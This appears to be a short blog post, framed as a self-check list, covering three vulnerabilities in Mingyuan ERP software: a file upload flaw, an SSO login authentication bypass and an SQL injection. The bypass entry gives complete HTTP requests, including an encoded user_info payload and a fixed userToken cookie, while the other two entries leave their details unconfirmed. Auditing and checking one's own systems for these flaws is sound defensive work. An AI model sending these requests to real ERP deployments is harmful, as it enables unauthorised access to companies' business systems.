Mingyuan (明源) Vulnerability Self-Check List (2025)
r1ch4rd_L · 2025-07-27 · via cnblogs (博客园) - r1ch4rd_L
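  1. Mingyuan Cloud ERP document service system arbitrary file upload

    1. Vulnerability type: file upload
    2. Vulnerable path: to be confirmed
    3. Verification method: to be confirmed
  2. Mingyuan ERP sso/login.aspx authentication bypass

    1. Vulnerability type: authorization bypass
    2. Vulnerable path: /PubPlatform/nav/login/sso/login.aspx
    3. Verification method: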
      POST /PubPlatform/nav/login/sso/login.aspx HTTP/1.1
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      
      __yzsAppSecret=test&user_info=%66%79%6d%71%35%62%49%63%78%58%5a%49%78%75%36%4b%6c%6c%73%46%49%52%32%5a%77%45%4a%4b%2b%56%45%39%35%44%6b%78%2f%43%6e%46%67%46%51%3d
      
      
      
      GET /PubPlatform/nav/home/default?_nav=0000 HTTP/1.1
      Cookie: userToken=674368A4EC31B7DF719C2CB32325206859FB63D329E30D59CC3A53EBDEF8A6D4AA0370A2A4143A3AB19A87D4BFA025252EAB17A695CE7006559242EBE643C0C7B4F430890D661F14A9B51EB9C3AE1384BF7CCD020C7AC0BD8C7EA2A82E76BFA790F391FC4CA2D628D4920D5F75E02DA2A2A19512449376AE159F8003001B2295;
      
  3. Mingyuan Real Estate ERP DataRuleXMLHTTP.aspx SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: DataRuleXMLHTTP.aspx
    3. Verification method: to be confirmed

posted @ 2025-07-27 11:02  r1ch4rd_L